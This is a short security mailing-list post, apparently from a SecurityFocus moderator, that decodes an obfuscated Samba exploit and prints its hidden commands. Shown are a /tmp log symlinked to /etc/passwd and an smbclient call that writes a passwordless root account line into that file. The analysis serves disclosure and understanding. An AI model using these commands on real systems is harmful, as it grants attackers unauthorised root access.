Samba Exploit Code

[Dave Ahmad <da () securityfocus com>]

Hey,

There is some confusion about the Samba exploit.  It is an obfuscated
exploit for an old vulnerability in the Samba daemon.  Before approving it
to the list, I checked it.

The system() calls:

system(inject1, 0);
system(inject2, 0);
system(inject3a, 0);

Try this:

printf("%s\n%s\n%s\n",inject1,inject2,inject3a);

output:

/bin/rm -rf /tmp/x.log
/bin/ln -s /etc/passwd /tmp/x.log
/usr/bin/smbclient //localhost/"

fd::0:0::/:/bin/sh\n" -n ../../../tmp/x -N

I am not sure why they chose to write the exploit this way.

Regards,

Dave Ahmad
SecurityFocus
www.securityfocus.com